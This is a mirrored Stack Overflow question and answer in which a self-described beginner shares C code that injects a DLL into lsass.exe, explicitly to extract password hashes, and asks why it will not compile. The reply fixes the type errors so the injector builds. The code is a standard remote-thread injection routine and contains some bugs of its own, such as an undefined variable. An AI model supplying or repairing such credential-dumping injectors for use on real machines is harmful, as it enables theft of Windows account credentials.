dll injection using C

问题

hey i m trying to inject a dll into a process i.e lsass.exe to get hashes.Its a bit hacky but cant help its my project. I have a code of dll injection but in visual C++ it gives errors such as..

at TEXT("LoadLibraryA"))))---->>>argument const wchar incompatible with LPCSTR

at lpFuncAddr----------->>>argument type "LPVOID" incompatible with parameter type "LPTHREAD_START ROUTINE"

CODE:

BOOL InjectDLL(DWORD dwProcessId, LPCSTR lpszDLLPath)
{
   HANDLE  hProcess, hThread;
   LPVOID  lpBaseAddr, lpFuncAddr;
   DWORD   dwMemSize, dwExitCode;
   BOOL    bSuccess = FALSE;
   HMODULE hUserDLL;


   //convert char to wchar
    char *lpszDLLPath = "hash.dll";
          size_t origsize = strlen(orig) + 1;
          const size_t newsize = 100;
          size_t convertedChars = 0;
          wchar_t dllpath[newsize];
          mbstowcs_s(&convertedChars, dllpath, origsize, orig, _TRUNCATE); 

   if((hProcess = OpenProcess(PROCESS_CREATE_THREAD|PROCESS_QUERY_INFORMATION|PROCESS_VM_OPERATION
       |PROCESS_VM_WRITE|PROCESS_VM_READ, FALSE, dwProcessId)))
   {
       dwMemSize = wcslen(dllpath) + 1;
       if((lpBaseAddr = VirtualAllocEx(hProcess, NULL, dwMemSize, MEM_COMMIT, PAGE_READWRITE)))
       {
           if(WriteProcessMemory(hProcess, lpBaseAddr, lpszDLLPath, dwMemSize, NULL))
           {
               if((hUserDLL = LoadLibrary(TEXT("kernel32.dll"))))
               {
                   if((lpFuncAddr = GetProcAddress(hUserDLL, TEXT("LoadLibraryA"))))
                   {
                       if((hThread = CreateRemoteThread(hProcess, NULL, 0, lpFuncAddr, lpBaseAddr, 0, NULL)))
                       {
                           WaitForSingleObject(hThread, INFINITE);
                           if(GetExitCodeThread(hThread, &dwExitCode)) {
                               bSuccess = (dwExitCode != 0) ? TRUE : FALSE;
                            }
                           CloseHandle(hThread);
                       }
                   }
                   FreeLibrary(hUserDLL);
                }
            }
           VirtualFreeEx(hProcess, lpBaseAddr, 0, MEM_RELEASE);
       }
       CloseHandle(hProcess);
   }
   return bSuccess;
}

int WINAPI WinMain(HINSTANCE hThisInstance, HINSTANCE hPrevInstance, LPSTR lpszCmdLine, int nCmdShow)
{
    if(InjectDLL(PROCESSID, "hash.dll")) {
        MessageBox(NULL, TEXT("DLL Injected!"), TEXT("DLL Injector"), MB_OK);
    }else {
        MessageBox(NULL, TEXT("Couldn't inject DLL"), TEXT("DLL Injector"), MB_OK | MB_ICONERROR);
    }

    return 0;
}

i m a beginner to dll and windows programming so will appreciate your help.

回答1:

It looks like your functions are expecting LPCSTR instead of LPCTSTR. Lose the TEXT() macros and it should be fine.

For the second error, you should be able to cast lpFuncAddr to an LPTHREAD_START_ROUTINE with a simple static cast.

 if((hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)lpFuncAddr, lpBaseAddr, 0, NULL)))

来源：https://stackoverflow.com/questions/4648059/dll-injection-using-c